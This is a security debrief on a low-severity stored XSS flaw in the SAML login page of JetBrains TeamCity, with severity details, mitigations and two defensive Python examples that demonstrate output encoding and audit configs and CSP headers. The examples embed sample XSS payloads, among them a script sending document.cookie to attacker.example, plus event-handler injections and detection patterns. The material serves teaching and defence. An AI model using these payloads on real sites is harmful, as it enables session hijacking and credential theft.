PatchSiren cyber security CVE debrief
CVE-2026-49381 JetBrains CVE debrief
A stored cross-site scripting (XSS) vulnerability in JetBrains TeamCity before version 2026.1 allows an attacker with administrative privileges to inject malicious scripts into the SAML login page. Exploitation requires high privileges and user interaction, which limits its practical impact. The CVSS 3.1 base score of 3.4 reflects the need for an authenticated administrator to plant the payload and for a victim to load the crafted login page. The attack vector is network-based with low complexity; the scope is rated as changed because the injected script runs in the victim's browser rather than in the vulnerable TeamCity component itself. JetBrains addressed the issue in TeamCity 2026.1. Organizations running affected versions should upgrade, particularly where SAML authentication is enabled and more than one person holds administrative access.
- Vendor: JetBrains
- Product: TeamCity
- CVSS: LOW 3.4
- CISA KEV: Not listed in stored evidence
- Original CVE published: 2026-05-29
- Original CVE updated: 2026-05-29
- Advisory published: 2026-05-29
- Advisory updated: 2026-05-29
Who should care
Organizations running JetBrains TeamCity with SAML authentication enabled, particularly those with multiple administrators or shared administrative access. Security teams responsible for CI/CD infrastructure and identity federation configurations should assess exposure.
Technical summary
The vulnerability exists in the SAML login page implementation of JetBrains TeamCity prior to 2026.1. Administrator-controlled SAML configuration values are rendered into the login page without proper output encoding, so a privileged user can store script in them and have it execute in the browser of anyone who loads that page. Because the payload is served from the TeamCity origin, a successful attack could expose other users to session hijacking or credential capture during the SAML login flow. The prerequisite matters when judging risk: an attacker who already holds TeamCity administrator rights has broad control of the server regardless, and this flaw mainly adds a way to reach other users' browser sessions, which is why the realistic threat is a malicious or compromised administrator account. The vulnerability is classified as CWE-79 and carries a LOW severity rating due to these prerequisite conditions.
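To make the mechanism concrete, the following is an added illustration, not code from TeamCity or from the JetBrains advisory. It models a hypothetical admin-editable SAML setting (the field name `idp_display_name` and the template are assumptions) being rendered into a login page first verbatim, as CWE-79 describes, and then with HTML entity encoding. The value lands both inside an attribute and in element text, so both a `<script>` payload and an attribute break-out are tried.

```python
import html

# Constructed sample data (not TeamCity's real configuration keys): a
# hypothetical admin-editable SAML setting that the login page renders.
BENIGN_CONFIG = {"idp_display_name": "Corporate SSO"}
SCRIPT_PAYLOAD_CONFIG = {
    "idp_display_name": 'Corporate SSO<script>fetch("https://attacker.example/?c="+document.cookie)</script>'
}
ATTRIBUTE_PAYLOAD_CONFIG = {
    "idp_display_name": 'Corporate SSO" onmouseover="alert(document.domain)'
}

# Minimal stand-in for a login-page template (an assumption, not TeamCity's
# markup): the value appears in an attribute and in element text, so both
# contexts need encoding.
LOGIN_TEMPLATE = (
    '<form action="/saml/login">'
    '<button title="{name}">Log in with {name}</button>'
    "</form>"
)


def render_login_vulnerable(config: dict) -> str:
    """Interpolates the stored value verbatim: the CWE-79 pattern."""
    return LOGIN_TEMPLATE.format(name=config["idp_display_name"])


def render_login_hardened(config: dict) -> str:
    """HTML-entity-encodes the stored value, quotes included, before rendering."""
    return LOGIN_TEMPLATE.format(name=html.escape(config["idp_display_name"], quote=True))


def has_injected_markup(page: str) -> bool:
    """Crude detector: a raw <script> tag or an attribute break-out in the output."""
    lowered = page.lower()
    return "<script" in lowered or '" onmouseover="' in lowered


if __name__ == "__main__":
    for label, cfg in (("script", SCRIPT_PAYLOAD_CONFIG), ("attribute", ATTRIBUTE_PAYLOAD_CONFIG)):
        print(label, "vulnerable:", has_injected_markup(render_login_vulnerable(cfg)))
        print(label, "hardened: ", has_injected_markup(render_login_hardened(cfg)))
```

The hardened variant encodes `<`, `>`, `&` and both quote characters, which covers element text and quoted attributes; values interpolated into URLs, inline scripts or unquoted attributes need context-specific encoding that `html.escape` alone does not provide.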
Defensive priority
LOW
Recommended defensive actions
- Upgrade JetBrains TeamCity to version 2026.1 or later
- Review SAML configuration pages for unauthorized modifications if running affected versions
- Implement principle of least privilege for administrative accounts
- Enable Content Security Policy headers where supported to mitigate XSS impact
- Monitor authentication logs for anomalous SAML-related activity
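Two of the actions above, reviewing SAML configuration values for unauthorized modifications and checking that a Content Security Policy would actually blunt an injected script, can be scripted. The block below is an added example, not tooling from JetBrains or the page; the SAML field names and the sample header values are constructed, and the audit is a heuristic that should be combined with a diff against a known-good export of the configuration.

```python
import re

# Constructed sample SAML settings (field names are assumptions, not
# TeamCity's real keys): one clean copy, one carrying injected payloads.
CLEAN_SAML_CONFIG = {
    "idp_display_name": "Corporate SSO",
    "idp_entity_id": "https://idp.example.com/metadata",
    "login_button_label": "Sign in with SSO",
}
TAMPERED_SAML_CONFIG = {
    "idp_display_name": "Corporate SSO<img src=x onerror=alert(1)>",
    "idp_entity_id": "https://idp.example.com/metadata",
    "login_button_label": "Sign in\" onclick=\"location='https://attacker.example'",
}

# Markup that has no business in a display label: tags, inline event
# handlers and script-scheme URLs.
SUSPICIOUS = [
    (re.compile(r"<\s*/?\s*[a-zA-Z]"), "html tag"),
    (re.compile(r"\bon[a-zA-Z]+\s*="), "inline event handler"),
    (re.compile(r"javascript\s*:", re.IGNORECASE), "javascript: URL"),
]


def audit_saml_config(config: dict) -> list[tuple[str, str]]:
    """Returns (field, reason) pairs for values that look like injected markup."""
    findings = []
    for field, value in config.items():
        for pattern, reason in SUSPICIOUS:
            if pattern.search(value):
                findings.append((field, reason))
                break  # one reason per field is enough to flag it
    return findings


def parse_csp(header: str) -> dict[str, list[str]]:
    """Splits a Content-Security-Policy header into directive -> source list."""
    directives = {}
    for part in header.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    return directives


def csp_script_weaknesses(header: str) -> list[str]:
    """Lists reasons a CSP would fail to stop a stored XSS payload."""
    directives = parse_csp(header)
    sources = directives.get("script-src", directives.get("default-src"))
    if sources is None:
        return ["no script-src or default-src: inline scripts allowed"]
    weaknesses = []
    # Per CSP level 3, a nonce or hash source makes 'unsafe-inline' inert.
    has_nonce_or_hash = any(
        s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-")) for s in sources
    )
    if "'unsafe-inline'" in sources and not has_nonce_or_hash:
        weaknesses.append("'unsafe-inline' permits injected inline scripts")
    if "*" in sources or "data:" in sources:
        weaknesses.append("wildcard or data: source permits attacker-hosted scripts")
    if "'unsafe-eval'" in sources:
        weaknesses.append("'unsafe-eval' widens what injected code can do")
    return weaknesses


# Constructed header values: a permissive policy beside a nonce-based one.
WEAK_CSP = "default-src 'self'; script-src 'self' 'unsafe-inline' *"
HARDENED_CSP = "default-src 'self'; script-src 'self' 'nonce-r4nd0m'; object-src 'none'"

if __name__ == "__main__":
    print("clean config:", audit_saml_config(CLEAN_SAML_CONFIG))
    print("tampered config:", audit_saml_config(TAMPERED_SAML_CONFIG))
    print("weak CSP:", csp_script_weaknesses(WEAK_CSP))
    print("hardened CSP:", csp_script_weaknesses(HARDENED_CSP))
```

The CSP check deliberately treats a nonce or hash as neutralising `'unsafe-inline'`, because browsers that understand nonces ignore that keyword; whether a nonce-based policy can be deployed in front of TeamCity without breaking its own pages is something to verify in a test instance, which is why the advisory phrases the action as "where supported".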
Evidence notes
Vulnerability confirmed via official JetBrains security advisory and NVD entry. CWE-79 (Improper Neutralization of Input During Web Page Generation) identified as root cause. CVSS vector confirms high privilege requirement (PR:H) and user interaction dependency (UI:R).
Official resources
- CVE-2026-49381 CVE record (CVE.org)
- CVE-2026-49381 NVD detail (NVD)
- Source item: nvd_modified
- Source reference: 2026-05-29